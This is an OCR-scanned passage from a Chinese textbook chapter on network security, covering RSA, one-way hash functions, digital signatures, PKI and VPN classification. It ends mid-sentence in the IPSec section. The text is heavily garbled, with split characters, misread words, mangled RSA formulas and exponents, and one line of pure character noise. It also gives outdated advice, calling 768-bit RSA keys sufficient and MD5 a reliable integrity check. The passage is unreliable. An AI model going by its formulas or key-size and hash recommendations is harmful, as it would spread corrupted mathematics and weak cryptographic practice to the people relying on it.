RSA 算法 是 第 一 个 能 同时 用 于 加 密 和 数字 签名 的 非 对 称 密码 算法 ， 算 法 的 名 字 以 发 明 
者 的 名 字 Ron Rivest、AdiShamir 和 Leonard Adleman 命名 。 该 算法 也 是 被 研究 得 最 广泛 的 
公 钥 算法 ， 从 提出 到 现在 已 近 二 十 年 ， 经 历 了 各 种 攻击 的 考验 ， 成 为 被 普遍 认为 是 目前 最 
优秀 的 公 钥 方案 之 一 。 它 利用 两 个 很 大 的 质数 相 乘 所 产生 的 乘积 来 加 密 。 这 两 个 质数 无 论 
哪 一 个 先 与 原文 件 编码 相 乘 ， 对 文件 加 密 ， 均 可 由 另 一 个 质数 再 相 乘 来 解密 。 但 要 用 一 个 
质数 来 求 出 另 一 个 质数 ， 则 是 十 分 困难 的 。 因 此 将 这 一 对 质数 称 为 密 钥 对 (Key Pair)。 在 加 
密 应 用 时 ， 某 个 用 户 总 是 将 一 个 密 钥 公开 ， 让 需 发 信 的 人 员 将 信息 用 其 公共 密 钥 加 密 后 发 
给 该 用 户 ， 而 一 旦 信息 加 密 后 ， 只 有 用 该 用 户 一 个 人 知道 的 私 用 密 钥 才 能 解密 。 具 有 数字 
凭证 身份 的 人 员 的 公共 密 钥 可 在 网 上 查 到 ， 亦 可 在 请 对 方 发 信息 时 主动 将 公共 密 钥 传 给 对 
方 ， 这 样 保证 在 Intemet 上 传输 信息 的 保密 和 安全 。 

1) ” 密 钥 生成 

RSA 的 算法 涉及 三 个 参数 ，n、e、d， 其 中 被 称 为 模 数 ， 是 两 个 大 质数 p、q 的 积 ，n 
的 二 进 制 表示 时 所 占用 的 位 数 ， 就 是 所 谓 的 密 钥 长 度 。e 和 d 是 一 对 相关 的 值 ，e 可 以 任意 
取 ， 但 要 求 e 与 (p-1)x(q-1) 互 质 ， 再 选择 d， 要 求 (dxe-1) 能 被 -1)x(q-D) 整 除 。 值 e 和 
分 别称 为 公共 指数 和 私有 指数 。 公 钥 是 数 对 mn，e)， 密 钥 是 数 对 (n，d)。 

2) ”加 密 

获得 信息 接收 者 的 公开 密 钥 (n，e)。 

(1) 将 明文 分 组 : m=m0，ml，m2，…，mk-1。 使 得 mi<n(i=0，1，…，k-1)。 

(2) 对 每 一 组 明文 用 一 下 公式 做 加 密 变 换 ci=E(mi)=mie(mod n)。 

(3) 得 到 密 文 c=c0，cl，c2，…*，ck-1。 

3) ”解密 

(1) 对 每 一 密 文 做 解密 变换 mi=D(ci)=cd (mod n)。 

(2) 合并 分 组 得 到 的 明文 m=m0，ml，m2，…，mkr-1。 

知道 公 钥 可 以 得 到 获取 私 钥 的 途径 ， 但 这 取决 于 将 模 数 因 式 分 解 成 组 成 它 的 质数 。 如 
果 选 择 了 足够 长 的 密 钥 , 这 样 基本 上 不 可 能 获取 私 钥 .RSA 实验 室 建议 : 普通 公司 密 钥 1024 
位 就 已 足够 。 对 及 其 重要 的 资料 , 就 用 双 倍 的 大 小 2048 位 。 日 常 使 用 768 位 就 能 满足 要 求 。 

密 钥 的 长 度 会 影响 加 密 和 解密 的 速度 ， 所 以 这 里 有 一 个 权衡 。 将 模 数 加 倍 会 使 得 使 用 
公 的 操作 时 间 增 加 到 原来 的 4 倍 ， 使 用 私 钥 解密 和 解密 需要 的 时 间 将 增加 到 原来 的 8 倍 。 


6.2.3 单 向 散 列 算法 


单 向 散 列 函数 指 的 是 根据 输入 消息 (任何 字 节 串 ， 如 文本 字符 串 、Word 文档 、JPG 文 


件 等 ) 输 出 固定 长 度数 值 的 算法 ， 输 出 数值 也 称 为 “ 散 列 值 ”或 “消息 摘要 *， 其 长 度 取决 于 所 
采用 的 算法 , 通常 在 128 一 256 位 之 间 。 单 向 散 列 函数 旨 在 创建 用 于 验证 消息 完整 性 的 简短 
摘要 。 在 诸如 TPC/IP 等 通信 协议 中 ， 常 采用 检验 和 或 CRC( 循 环 见 余 校 验 ) 来 验证 消息 的 完 
整 性 。 消 息 发 送 方 计算 消息 的 校 验 和 并 将 其 随 消息 一 起 发 送 ， 接 收 方 重新 计算 校 验 和 并 将 
其 与 收 到 的 校 验 和 相 比 较 ， 如 果 两 者 不 同 ， 接 收 方 就 认为 消息 在 传送 过 程 中 受 损 ， 并 要 求 
发 送 方 重新 发 送 。 如 果 预 计 的 损坏 原因 是 电信 和 号 错误 或 其 他 自然 现象 ， 这些 方 法 是 可 行 的 。 
但 如 果 预 计 的 原因 是 恶意 的 狭 猎 攻击 者 的 故意 破坏 ， 则 需要 更 强 的 机 制 ， 在 这 种 情况 下 ， 
强加 密 单 向 散 列 函数 便 可 派 上 用 场 。 

强加 密 单 向 散 列 函数 是 这 样 设计 的 ， 不 可 能 通过 计算 找 出 两 条 散 列 值 相同 的 消息 。 对 
于 校 验 和 狭 独 的 攻击 者 可 以 轻易 地 对 消息 进行 修改 , 并 使 其 校 验 和 与 原 消 息 的 校 验 和 相同 ; 
而 对 于 循环 元 余 校 验 ， 达 到 这 样 的 目的 也 不 困难 。 但 强加 密 单 向 散 列 函数 却 能 令 这 一 目标 
遥 不 可 及 。 

MD5 和 SHA-1 是 两 种 强加 密 单 向 散 列 算法 , 其 中 MD5 是 Ron Rivest(RSA 算法 的 发 明 
者 之 一 ) 于 1992 年 发 明 的 ， 该 算法 生成 128 位 的 散 列 值 ; 而 SHA-1 是 由 美国 国家 标准 与 技 
术 研 究 院 (National Institute of Standards and Technology,NIST) 于 1995 年 发 明 的 , 它 生成 160 
位 的 散 列 值 。SHA-1 的 计算 速度 比 MD5 慢 ， 但 由 于 生成 的 散 列 值 更 长 而 被 认为 具有 更 强 
的 加 密 能 力 。 

对 SHA-1 单 向 散 列 算法 的 破解 : 

2005 年 2 月 , 中 国 山东 大 学 的 研究 者 王小云 发 表 了 一 篇 论文 , 演示 了 使 用 SHA-1 算法 
找 出 两 条 能 生成 相同 散 列 值 的 消息 ， 这 种 情况 称 为 “碰撞 *。 单 向 散 列 算法 的 目的 和 好 处 是 
能 使 不 同 的 消息 生成 不 同 的 散 列 值 ， 只 有 穷 举 所 有 可 能 情况 才能 找 出 碰撞 ， 这 种 做 法 称 为 
“ 齐 力 ”攻击 , 需要 执行 28( 约 10 并, 1 百 万 亿 亿 ) 次 散 列 运 算 。 但 此 项 新 研究 显示 , 通过 2%( 约 
5x10 ””，500 亿 亿 ) 次 散 列 运 算 便 有 可 能 找 出 碰撞 。 

实际 上 ， 这 没有 什么 大 不 了 的 。 例 如 ， 没 人 能 在 修改 X.509 数字 证 书 中 Web 地 址 的 同 
时 使 证 书 和 签署 时 一 样 。 但 这 如 同 番 甲 的 一 个 小 瑕 疲 ， 随 着 对 各 种 加 密 算法 更 具 威 胁 的 攻 
击 方式 的 研究 ， 瑕 症 也 会 越 来 越 多 。 因 此 ， 总 体 建议 是 : 应 该 考虑 放弃 SHA-1， 并 选择 更 
新 的 单 向 散 列 函数 ， 如 SHA-2 或 SHA-512。 

在 此 举 一 个 使 用 散 列 函数 的 例子 ， 假 设 某 个 开放 源码 项 目 将 其 产品 发 布 到 多 个 镜像 站 
点 以 供 下 载 , 并 在 主 站 提供 了 由 整个 下 载 文件 计算 得 到 的 MDS 散 列 值 。 如 果 攻 击 者 攻破 了 
一 个 镜像 站 点 ， 在 产品 中 插入 一 些 恶 意 代 码 ， 那 么 他 必须 能 调整 代码 的 其 他 部 分 ， 使 MD5 
的 输出 与 以 前 相同 。 如 果 使 用 的 是 校 验 和 或 CRC， 那 么 攻击 者 便 很 容易 达到 目的 。 但 MD5 
是 专门 为 防止 这 种 攻击 而 设计 的 , 因此 任何 人 下 载 了 修改 过 的 文件 后 , 通过 检查 MD5 散 列 
值 都 将 发 现 文件 已 不 是 原来 的 。 

再 举 一 个 例子 ,假设 通信 双方 使 用 TCP/IP 连接 进行 通信 。TCP 使 用 CRC 来 校 验 消息 ， 
但 正如 前 面 所 提 到 的 ，CRC 是 可 攻破 的 。 因 此 ， 为 提高 安全 ， 假 设 通 信 双 方 在 TCP 协议 之 
上 使 用 了 这 样 一 种 应 用 层 协议 : 在 每 条 消息 末尾 加 上 MDS5 散 列 值 。 假设 攻击 者 处 于 通信 双 
方 之 间 ， 并 能 够 修改 TCP 流 的 内 容 ， 那 么 他 能 攻破 MD5 校 验 吗 ? 

如 果 经 验证 他 能 攻破 , 攻击 者 只 需 修 改 数据 流 , 然后 根据 新 数据 重新 计算 MD5 散 列 值 ， 
并 将 其 加 在 消息 后 面 。 由 于 通信 数据 可 以 是 任何 内 容 (如 在 即时 通信 信道 上 进行 的 动态 对 
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话 )， 因 此 通信 双方 无 法 校 验 MD5 值 。 

对 于 散 列 函 数 , 与 任何 加 密 算 法 一 样 ， 明智 的 开发 人 员 会 选择 一 种 经 实践 检验 的 算法 ， 
而 不 是 从 头 开发 。 经 实践 检验 的 算法 都 经 过 大 量 的 详细 审查 ， 如 MD5 和 SHA 1 算法 ， 但 
也 有 很 多 算法 因为 漏洞 和 弱点 而 被 淘汰 了 。 


6.2.4 数字 签名 


在 文件 上 手写 签名 长 期 以 来 被 用 作 作者 身份 的 证 明 ， 或 表明 签名 者 同意 文件 内 容 。 签 
名 体现 了 以 下 几 个 方面 的 保证 : 

(1) 签名 可 信 ， 签 名 使 得 文件 的 接受 者 相信 签名 者 是 很 认真 地 签名 的 。 

(2) 签名 不 可 伪造 ， 签 名 证 明 是 签名 者 而 不 是 其 他 人 在 文件 上 签字 。 

(3) 签名 不 可 重复 使 用 ， 是 文件 的 一 部 分 ， 不 能 将 其 移动 到 其 他 的 文件 上 。 

(4) 签名 不 可 抵赖 。 签 名 者 事后 要 承认 签 了 名 。 

信息 时 代 ， 计 算 机 网 络 技术 高 度 发 展 ， 加 密 技 术 已 经 渗透 到 人 们 的 日 常生 活 中 ， 改 变 
了 传统 的 事务 处 理 方式 。 互 联网 上 ， 人 们 需要 通过 数字 通信 网 络 传递 贸易 合同 。 数 字 签 名 
就 是 为 了 解决 在 网 络 上 如 何 表示 自己 身份 ， 如 何 确保 数据 的 完整 性 、 私 有 性 和 不 可 抵赖 
性 的 。 

数字 签名 (Digital Signature) 是 一 种 基于 密码 的 身份 鉴别 技术 。 以 往 的 书信 或 文件 是 根据 
亲笔 签名 或 印章 来 证 明 其 真实 性 的 。 但 在 计算 机 网 络 中 传送 的 报 文 双 如何 盖 章 呢 ? 这 就 是 
数字 签名 所 要 解决 的 问题 。 数 字 签 名 必须 保证 以 下 几 点 : 接收 者 能 够 核实 发 送 者 对 报 文 的 
签名 ;发 送 者 事后 不 能 抵赖 对 报 文 的 签名 ;接收 者 不 能 伪造 对 报 文 的 签名 。 

现在 已 有 多 种 实现 数字 签名 的 方法 ， 但 采用 公开 密 钥 算 法 要 比 常规 算法 更 容易 实现 。 
数字 签名 通常 包括 两 个 不 同 的 过 程 : 数字 签名 的 创建 和 数字 签名 的 验证 ， 分 别 由 签名 者 和 
接收 者 执行 。 数 字 签 名 的 创建 使 用 从 被 签名 的 消息 及 给 定 的 私有 密 钥 两 者 导出 唯一 于 它们 
和 散 列 结果 和 数字 签名 。 为 保证 散 列 结果 的 安全 性 ， 要 使 由 任何 其 他 消息 和 私有 密 钥 的 组 
， 而 创建 得 到 相同 散 列 结果 和 数字 签名 的 几率 极其 微小 。 数 字 签 名 的 验证 是 通过 参照 原 
始 消息 和 给 定 的 公开 密 钥 来 检查 数字 签名 的 过 程 ， 它 判断 数字 签名 是 否 由 对 相同 的 消息 使 
对 应 于 所 引用 的 公开 密 钥 的 私有 密 钥 而 创建 得 到 的 ， 如 图 6-5 所 示 。 
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图 6-5 描述 的 是 数字 签名 的 创建 过 程 。 为 了 对 文档 或 任何 其 他 形式 的 信息 进行 签名 ， 
签名 者 必须 首先 精确 界定 所 要 签名 的 范围 ， 界 定 后 的 待 签名 信息 称 为 “消息 ”。 然 后 ， 签 


名 者 的 软件 中 的 散 列 函数 计算 出 一 个 唯一 于 消息 的 散 列 结果 ， 签 名 者 的 软件 接着 使 用 签 
者 的 私有 密 钥 将 散 列 结果 转换 成 数字 签名 。 所 得 到 的 数字 签名 因而 唯一 用 来 创建 它 
和 私有 密 钥 。 图 6-5 中 的 签名 函数 的 作用 实际 上 就 是 用 私有 密 钥 对 散 列 结果 解密 得 到 数字 
签名 。 

数字 签名 的 验证 是 通过 使 用 与 创建 数字 签名 时 所 用 的 相同 散 列 函 数 ， 对 原始 消息 计算 
新 的 散 列 结果 而 实现 的 。 验 证 者 然后 使 用 公开 密 钥 和 新 的 散 列 结果 检查 : 

(1) 数字 签名 是 不 是 使 用 对 应 的 私有 密 钥 而 创建 的 。 

(2) 计算 出 的 新 散 列 结果 是 否 与 在 签名 过 程 中 转换 为 数字 签名 的 原始 散 列 结果 匹配 ， 
如 图 6-6 所 示 。 
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图 6-6 数字 签名 的 验证 
6.2.5 ” 公 钥 基础 设施 PKI 


公 钥 基础 设施 PKI(Public Key Infrastructure) 是 一 种 新 的 安全 技术 ， 它 利用 公 钥 概念 和 
加 密 技 术 为 网 上 通信 提供 整套 的 安全 基础 平台 。 能 为 各 种 不 同安 全 需求 的 用 户 提供 网 上 安 
全 服务 ， 主 要 有 身份 识别 与 鉴别 (认证 )、 数 据 保 密 性 、 数 据 完 整 性 、 不 可 和 否认 性 及 时 间 戳 
服务 等 。 用 户 利用 PKI 所 提供 的 这 些 安全 服务 进行 安全 通信 ， 以 及 不 可 和 否认 的 安全 电子 交 
易 活 动 。 现 在 世界 范围 内 ，PKI 已 得 到 广泛 的 应 用 ， 如 安全 电子 邮件 、Web 访问 、 虚 拟 专 
用 网 络 VPN 和 本 地 简单 登录 认证 ， 以 及 电子 商务 、 电 子 政务 、 网 上 银行 和 网 上 证 券 交 易 等 
各 种 强 认证 系统 都 应 用 了 PKI 技术 。 

PKI(Public Key Infrastructure) 公 钥 基 础 设施 由 公开 密 钥 密码 技术 、 数 字 证 书 、 证 书 发 放 
机 构 (CA) 和 关于 公开 密 钥 的 安全 策略 等 基本 成 分 共同 组 成 的 , 目的 是 为 了 管理 密 钥 和 证 书 。 
一 个 机 构 通过 采用 PKI 框架 管理 密 钥 和 证 书 可 以 建立 一 个 安全 的 网 络 环境 。 一 个 典型 、 完 
整 、 有 效 的 PKI 应 用 系统 至 少 应 具有 以 下 五 个 部 分 。 

1. 认证 中 心 CA 


CA 是 PKI 的 核心 ，CA 负责 管理 PKI 结构 下 的 所 有 用 户 ( 包 括 各 种 应 用 程序 ) 的 证 书 ， 
把 用 户 的 公 钥 和 用 户 的 其 他 信息 捆绑 在 一 起 , 在 网 上 验证 用 户 的 身份 , CA 还 要 负责 用 户 证 
书 的 黑 名 单 登记 和 黑 名 单 发 布 。 

2. X.500 目录 服务 器 

X.500 目录 服务 器 用 于 发 布 用 户 的 证 书 和 黑 名 单 信 息 ， 用 户 可 通过 标准 的 LDAP 协议 
查询 自己 或 其 他 人 的 证 书 和 下 载 黑 名 单 信息 。 


( 


潼 洲 革 粕 半 ”车 潍 式 褒 睹 久 囊 妇 弹 


3. 具有 高 强度 密码 算法 (SSL) 的 安全 
WWW 服务 器 Secure socket layer(SSL) 协 议 最 初 由 Netscape 企业 发 展 ， 现 已 成 为 网 络 
来 鉴别 网 站 和 网 页 浏览 者 身份 ， 以 及 在 浏览 器 使 用 者 及 网 页 服务 器 之 间 进 行 加 密 通 信 的 
全 球 化 标准 。 
4. Web( 安 全 通信 平台 ) 


Web 有 Web Client 端 和 Web Server 端 两 部 分 ， 分 别 安装 在 客户 端 和 服务 器 端 ， 通 过 
其 有 高 强度 密码 算法 的 SSL 协议 保证 客户 端 和 服务 器 端 数据 的 机 密 性 、 完 整 性 、 身 份 验证 。 
5. 自 开 发 安全 应 用 系统 


自 开 发 安全 应 用 系统 是 指 各 行业 自 开 发 的 各 种 具体 应 用 系统 ， 例 如 银行 、 证 券 的 应 用 
系统 等 。 完 整 的 PKI 包括 认证 政策 的 制定 (包括 遵循 的 技术 标准 、 各 CA 之 间 的 上 下 级 或 
同 级 关系 、 安 全 策略 、 安 全 程度 、 服 务 对 象 、 管 理 原则 和 框架 等 )、 认 证 规则 、 运 作 制 度 的 
制定 、 所 涉及 的 各 方法 律 关 系 内 容 以 及 技术 的 实现 等 。 

前 面 已 经 知道 :普通 的 对 称 密码 学 中 加 密 和 解密 使 用 同一 个 密 钥 。 对 称 加 密 算 法 简便 
高 效 、 密 钥 简 短 、 破 译 困难 ， 由 于 系统 的 保密 性 主要 取决 于 密 钥 的 安全 性 ， 所 以 ， 在 公开 
的 计算 机 网 络 上 安全 地 传送 和 保管 密 钥 是 重要 问题 。 因 对 称 密码 学 中 双方 使 用 相同 的 密 钥 ， 
故 无 法 实现 数据 签名 和 不 可 否认 性 等 功能 。 而 非 对 称 密码 学 ， 具 有 两 个 密 钥 ， 一 个 公 钥 一 
个 私 钥 ， 它 们 具有 这 样 的 性 质 ， 用 公 钥 加 密 的 文件 只 能 用 私 钥 解 密 ， 而 用 私 钥 加 密 的 文件 
只 能 用 公 钥 解密 。 公 钥 是 公开 的 ， 所 有 的 人 都 可 以 用 它 ， 私 钥 是 私有 的 ， 具 有 唯一 性 ， 不 
应 被 其 他 人 得 到 。 这 就 可 以 满足 电子 商务 中 的 一 些 安全 要 求 。 比 如 说 要 证 明 某 个 文件 是 特 
定 某 个 人 的 ， 这 个 人 就 可 以 用 他 的 私 钥 对 文件 加 密 ， 别 人 如 果 能 用 他 的 公 钥 解密 该 文件 ， 
说 明 此 文件 就 是 这 个 人 的 , 这 可 以 说 是 一 种 认证 的 实现 。 如果 只 想 让 某 个 人 看 到 一 个 文件 ， 
就 用 此 人 的 公 钥 加 密 文件 然后 传 给 他 ， 而 该 文件 只 有 用 特定 私 钥 才 可 以 解密 ， 这 就 是 保密 
性 的 实现 。 基 于 这 种 原理 还 可 以 实现 完整 性 。 这 是 PKI 依赖 的 核心 思想 。 

当 传 送 机 密 文件 时 ， 我 们 首先 会 想到 用 对 称 密码 将 文件 加 密 ， 而 在 把 加 密 后 的 文件 传 
送 给 接受 者 后 ， 我 们 又 必须 让 接收 方 知道 解密 用 的 密 钥 ， 这 就 产生 了 新 的 问题 : 如 何 保密 
的 传输 该 密 钥 ? 此 时 发 现 传输 对 称 密 钥 不 绝对 可 靠 。 后 来 改 用 非 对 称 密码 的 技术 加 密 。 又 
产生 了 新 的 问题 : 如 何 确 定 该 公 钥 就 是 某 个 人 的 ? 比如 说 我 们 想 传 给 A 一 个 文件 ， 于 是 开 
始 查找 A 的 公 钥 ,但 是 这 时 B 从 中 捣乱 ， 替 换 了 A 的 公 钥 ， 让 我 们 错误 地 认为 B 的 公 钥 
就 是 A 的 公 钥 ， 导 致 我 们 最 终 使 用 B 的 公 钥 加 密 文件 ， 结 果 A 无 法 打开 文件 ， 而 B 可 以 
打开 文件 ， 这 样 B 就 实现 了 对 保密 信息 的 窃取 行为 。 因 此 采用 非 对 称 密码 技术 ， 仍 然 无 法 
保证 保密 性 的 实现 ， 如 何 才能 确切 地 得 到 想 要 的 人 的 公 钥 是 权威 的 仲裁 机 构 
CA(Certification Authority) 的 主要 工作 ，CA 能 准确 无 误 地 提供 我 们 需要 的 人 的 公 和 钥 。 

PKI 中 ， 值 得 信赖 而 且 独立 的 第 三 方 机 构 充当 认证 中 心 (Certification Authority，CA)， 
来 确认 公 钥 拥有 人 的 真正 身份 。 就 像 公安 局 发 放 的 身份 证 一 样 ， 认 证 中 心 发 放 一 个 叫 “ 数 
字 证 书 ”的 身份 证 明 。 该 数字 证 书包 含 了 用 户 身份 的 部 分 信息 及 用 户 所 持 有 的 公 钥 。 像 公 
安 局 对 身份 证 盖 章 一 样 ， 认 证 中 心 利用 本 身 的 私 钥 为 数字 证 书 加 上 数字 签名 。 任 何 想 发 放 
自己 公 钥 的 用 户 ， 可 以 去 认证 中 心 申请 自己 的 证 书 。 认 证 中 心 在 鉴定 该 人 的 真实 身份 后 ， 
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颁发 包含 用 户 公 钥 的 数字 证 书 。 其 他 用 户 只 要 能 验证 证 书 是 真实 的 ， 并 且 信任 颁发 证 书 的 
认证 中 心 ， 就 可 以 确认 用 户 的 公 钥 。 


6.3 VPN 技术 


现在 ， 越 来 越 多 的 公司 走向 国际 化 ， 一 个 公司 可 能 在 多 个 国家 都 有 办 事 机 构 或 销售 中 
心 ， 每 一 个 机 构 都 有 自己 的 局 域 网 LAN(Local Area Network)， 但 在 当今 的 网 络 社 会 人 们 的 
要 求 不 仅 如 此 , 用 户 希 望 将 这 些 LAN 连接 在 一 起 组 成 一 个 公司 的 广域网 , 现在 做 到 这 些 已 
不 是 什么 难事 。 

事实 上 , 很 多 公司 都 已 经 这 样 做 了 , 但 他 们 一 般 使 用 租用 专用 线路 来 连接 这 些 局 域 网 ， 
他 们 考虑 的 就 是 网 络 的 安全 问题 。 现 在 具有 加 密 / 解 密 功 能 的 路 由 器 已 到 处 都 是 ， 这 就 使 人 
们 通过 互联 网 连接 这 些 局 域 网 成 为 可 能 ， 这 就 是 我 们 通常 所 说 的 虚拟 专用 网 (Virtual Private 
Network，VPN)。 当 数据 离开 发 送 者 所 在 的 局 域 网 时 ， 该 数据 首先 被 用 户 端 连接 到 互联 网 
上 的 路 由 器 进行 硬件 加 密 ,， 数 据 在 互联 网 上 是 以 加 密 的 形式 传送 的 ， 当 到 达 目 的 LAN 的 路 
由 器 时 ， 该 路 由 器 就 会 对 数据 进行 解密 ， 这 样 目的 LAN 中 的 用 户 就 可 以 看 到 真正 的 信息 。 


6.3.1 VPN 技术 的 概述 


VPN(Virtual Private Network) 即 虚拟 专用 网 ， 是 一 种 “基于 公共 数据 网 ， 给 用 户 一 种 
直接 连接 到 私人 局 域 网 感觉 的 服务 ”。 它 是 通过 一 个 公用 网 络 (通常 是 因特网 ) 建 立 一 个 临 
时 的 、 安 全 的 连接 ， 是 一 条 穿 过 混乱 的 公用 网 络 的 安全 、 稳 定 的 隧道 。 

VPN 极 大 地 降低 了 用 户 的 费用 ,而且 提供 了 比 传统 方法 更 强 的 安全 性 。 通常 ,VPN 是 
对 企业 内 部 网 的 扩展 ， 通 过 它 可 以 帮助 远程 用 户 、 公 司 分 支 机 构 、 商 业 伙 伴 及 供应 商 同 公 
司 的 内 部 网 建立 可 信 的 安全 连接 ， 并 保证 数据 的 安全 传输 。 

VPN 可 分 为 以 下 三 大 类 : 

(1) 企业 各 部 门 与 远程 分 支 之 间 的 Intranet VPN。 

(2) 企业 网 与 远程 (移动 ) 雇 员 之 间 的 远程 访问 (Remote Access)VPN。 

(3) 企业 与 合作 伙伴 、 客 户 、 供 应 商 之 间 的 Extranet VPN。VPN 可 用 于 不 断 增 长 的 移 
动用 户 的 全 球 因特网 接 入 ， 以 实现 安全 连接 ， 可 用 于 实现 企业 网 站 之 间 安 全 通信 的 虚拟 专 
用 线路 ， 用 于 经 济 有 效 地 连接 到 商业 伙伴 和 用 户 的 安全 外 联网 虚拟 专用 网 。 

VPN 架构 中 采用 了 多 种 安全 机 制 ， 如 隧道 技术 (Tunneling)、 加 解密 技术 (Encryption)、 
密 钥 管理 技术 、 身 份 认 证 技术 (Authentication) 等 , 通过 上 述 的 各 项 网 络 安全 技术 , 确保 资料 
在 公众 网 络 中 传输 时 不 被 窃取 ， 或 是 即使 被 窃取 了 ， 对 方 亦 无 法 读 取 数 据 包 内 所 传送 的 
资料 。 


6.3.2 VPN 的 分 类 


根据 VPN 所 起 的 作用 ， 可 将 其 分 为 三 类 : 企业 内 部 虚拟 网 (Intemet VPN)、 远 程 访问 
VPN(Remote Access VPN) 和 外 部 网 VPN(Extranet VPN)。 
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1. 内 部 VPN 

在 公司 总 部 和 它 的 分 支 机 构 之 间 建 立 的 VPN。 这 是 通过 公用 网 络 将 一 个 组 织 的 各 分 支 
机 构 通过 VPN 连接 而 成 的 网 络 , 它 是 公司 网 络 的 扩展 。 当 一 个 数据 传输 通道 的 两 个 端点 认 
为 是 可 信 的 时 候 ， 公 司 可 以 选择 “内 部 网 VPN” 解 决 方案 ， 安 全 性 主要 在 于 加 强 两 个 VPN 
服务 器 之 间 的 加 密 和 认证 手段 上 。 大 量 的 数据 经 常 需要 通过 VPN 在 局 域 网 之 间 传 递 ， 可 以 
把 中 心 数据 库 或 其 他 资源 连接 起 来 的 各 个 局 域 网 看 成 是 内 部 网 的 一 部 分 ， 如 图 6-7 所 示 。 


《| 


6-7 ”内 部 网 VPN 


2. 远程 访问 VPN 

在 公司 总 部 和 远 地 雇 员 或 旅行 中 的 雇员 之 间 建 立 的 VPN。 如 果 一 个 用 户 在 家 里 或 在 旅 
途 之 中 ， 想 同 公 司 的 内 部 网 建立 一 个 安全 连接 ， 可 以 用 “远程 访问 VPN” 来 实现 ， 实 现 过 
程 : 用 户 拨号 ISP(Intemet 服务 提供 商 ) 的 网 络 访问 服务 器 NAS(Network Access Server)， 
发 出 PPP 连接 请 求 ，NAS 收 到 呼叫 后 ， 在 用 户 和 NAS 之 间 建 立 PPP 链 路 ， 然 后 ，NAS 对 
用 户 进行 身份 验证 ， 确 定 是 合法 用 户 ， 就 启动 远程 访问 功能 ， 与 公司 总 部 内 部 连接 ， 访 问 
其 内 部 资源 ， 如 图 6-8 所 示 。 


图 6-8 ”远程 访问 VPN 
公司 常 制 定 一 种 “透明 的 访问 策略 ”， 即 使 在 远 地 的 雇员 也 能 像 坐 在 总 部 的 办 公 室 里 
一 样 自 由 地 访问 公司 的 资源 。 因 此 首先 要 考虑 的 是 所 有 端 到 端的 数据 都 要 加 密 ， 并 且 只 有 
特定 的 接收 者 才能 解密 。 这 种 VPN 要 对 用 户 的 身份 进行 认证 ， 而 不 仅仅 认证 卫 地 址 ， 这 
样 公司 就 会 知道 哪个 用 户 访问 公司 的 网 络 ， 认 证 后 决定 是 否 允许 用 户 对 网 络 资源 的 访问 。 
一 旦 一 个 用 户 通 过 公司 VPN 服务 器 的 认证 ， 根 据 他 的 访问 权限 表 ， 就 有 一 定 的 访问 权限 。 
每 个 人 的 访问 权限 表 由 网 络 管理 员 制 定 ， 并 且 要 符合 公司 的 安全 策略 。 有 较 高 安全 度 的 远 
程 访问 VPN 应 能 截取 到 特定 主机 的 信息 流 ， 有 加 密 、 身 份 验证 、 过 滤 等 功能 。 
3. 外 部 网 VPN 


在 公司 和 商业 伙伴 、 顾 客 、 供 应 商 、 投 资 者 之 问 建立 的 VPN。 外 部 网 VPN 为 公司 合 
作 伙 伴 、 顾 客 、 供 应 商 提供 安全 性 。 它 应 该 能 保证 包括 使 用 TCP 和 UDP 协议 的 各 种 应 用 
服务 的 安全 ， 例 如 ， 电 子 邮 件 、HTTP、FTP、 数 据 库 的 安全 以 及 一 些 应 用 程序 的 安全 。 
为 不 同 公司 的 网 络 环境 是 不 相同 的 , 一 个 可 行 的 外 部 网 VPN 方案 应 该 能 适用 于 各 种 操作 平 
台 。 协 议 、 各 种 不 同 的 认证 方案 及 加 密 算法 。 

外 部 VPN 的 主要 目标 是 保证 数据 在 传输 过 程 中 不 被 修改 ， 保 护 网 络 资源 不 受 外 部 威 
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胁 。 安 全 的 外 部 网 VPN 要 求 公司 在 同 他 的 顾客 、 合 作 伙伴 之 间 经 Intemet 建立 端 到 端的 连 
接 时 ,必须 通过 VPN 服务 器 才能 进行 。 这 种 系统 上 ， 网 络 管理 员 可 以 为 合作 伙伴 的 职员 指 
定 特定 的 许可 权 , 如 可 允许 对 方 的 销售 经 理 访问 一 个 受到 保护 安全 的 服务 器 上 的 销售 报告 ， 
如 图 6-9 所 示 。 


6-9 外 部 VPN 


外 部 网 VPN 应 该 是 一 个 加 密 、 认 证 和 访问 控制 功能 组 成 的 集成 系统 ,通常 公司 将 VPN 

服务 器 放 在 用 于 隔离 内 外 部 网 的 防火 墙 上 ， 防 火 墙 阻止 所 有 来 历 不 明 的 信息 传输 。 所 有 经 
过 过 滤 后 的 数据 通过 唯一 的 入 口传 到 VPN 服务 器 ，VPN 服务 器 再 根据 安全 策略 进一步 
过 滤 。 
外 部 网 VPN 并 不 假定 连接 的 公司 双方 之 间 存 在 的 双向 信任 关系 。 外 部 网 VPN 在 
Internet 内 打开 一 条 隧道 ， 并 保证 经 过 过 滤 后 的 信息 传输 的 安全 。 当 公司 将 很 多 商业 活动 安 
排 在 公共 网 络 上 进行 时 ， 一 个 外 部 网 VPN 应 该 用 高 强度 的 加 密 算 法 ， 密 钥 应 选 在 128 位 以 
上 。 此 外 应 支持 多 种 认证 方案 和 加 密 算 法 ， 因 为 商业 伙伴 和 顾客 可 能 有 不 同 的 网 络 结构 和 
操作 平台 。 

外 部 网 VPN 应 能 根据 尽 可 能 多 的 参数 来 控制 对 网 络 资源 的 访问 ， 参 数 包括 源 地 址 、 目 
的 地 址 、 应 用 程序 的 用 途 、 所 用 的 加 密 和 认证 类 型 、 个 人 身份 、 工 作 组 、 子 网 等 。 管 理 员 
应 能 对 个 人 身份 进行 认证 ， 而 不 是 仅仅 根据 下 地 址 。 


6.3.3 IPSec 


VPN 区 别 于 一 般 网 络 互联 的 关键 在 于 隧道 的 建立 。 数 据 包 经 过 加 密 后 ， 按 隧道 协议 进 
行 封装 、 传 送 以 保证 安全 。IPSec(IP and Security) 是 实现 虚拟 专用 网 络 的 一 种 重要 的 安全 隧 
道 协议 。 是 网 络 操作 系统 为 最 大 限度 地 保护 网 络 信息 流量 而 使 用 的 一 种 人 P 安全 机 制 。 IPSec 
主要 用 于 不 可 靠 的 人 P 网 络 通信 。 这 个 网 络 就 是 Intemet。 

IPSec 在 IP 层 上 对 数据 包 进 行 高 强度 的 安全 管理 ， 提 供 数据 源 验证 。 无 连接 数据 完整 
性 、 有 限 业 务 流 机 密 性 等 安全 服务 。 各 种 应 用 程序 可 以 享用 他 层 提供 的 安全 服务 和 密 钥 管 
